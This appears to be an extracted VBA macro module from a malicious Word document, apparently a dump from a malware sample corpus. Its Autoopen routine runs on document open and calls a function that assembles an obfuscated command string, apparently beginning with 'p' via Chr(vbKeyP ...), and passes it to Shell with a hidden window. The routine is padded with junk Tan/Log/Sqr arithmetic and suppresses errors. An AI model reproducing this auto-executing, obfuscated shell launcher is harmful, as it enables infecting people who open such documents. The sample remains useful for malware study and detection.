Filename     : ./macros/28c9aa9c414b83133dd9a2373ca197fabf10003e5e323f84b434596d59b90760
OLE stream   : Macros/VBA/LtKlPkqfFiI
VBA filename : LtKlPkqfFiI.cls
----------------------------------------
Attribute VB_Name = "LtKlPkqfFiI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function iiRcij()
On Error Resume Next
GWjHMz = Tan(BCzBz _
* Tan(RpiAqM * Int(FcBztK * Sqr(64831) / HwAsn + Fix(76299)) / 75959 * Round(63821 / Log(99204 - MYnYbh) + 15255 - EXkjGS)) _
/ 96448 + Log(86918))
iUjNBR = Tan(uDwILD _
* Tan(HiWinF * Int(AUsHGK * Sqr(58541) / riuuu + Fix(17516)) / 23541 * Round(36807 / Log(29491 - GuiXi) + 99740 - AucEj)) _
/ 77876 + Log(19754))
iiRcij = hjLLpJ + Shell(maKSBsKQ + Chr(XRhdJtHHHSc + vbKeyP + ZioGSLw) + AXkMLDIHDqs + hftlIFj + SJWTAN + wTSWNpT + VpiwVGXOVWL, 74714 - 74714)
NdAoFv = Tan(PWMQN _
* Tan(JUvLH * Int(hLCdm * Sqr(84910) / GPBTHt + Fix(70275)) / 14339 * Round(63399 / Log(60540 - iJPwi) + 15359 - SmIqZ)) _
/ 63834 + Log(86237))
End Function
Sub Autoopen()
On Error Resume Next
VcbKAN = Tan(XprNDE _
* Tan(cJcoj * Int(wDijuR * Sqr(38862) / ZPqUa + Fix(60668)) / 46772 * Round(14910 / Log(61894 - iwila) + 12703 - EHvJw)) _
/ 26760 + Log(70608))
iiRcij
LdRtuQ = Tan(tqwZBt _
* Tan(YwUdGK * Int(wMdcPp * Sqr(19543) / vbBFW + Fix(27974)) / 3027 * Round(12674 / Log(26692 - FvErnA) + 9344 - bizoU)) _
/ 13887 + Log(51206))
End Sub


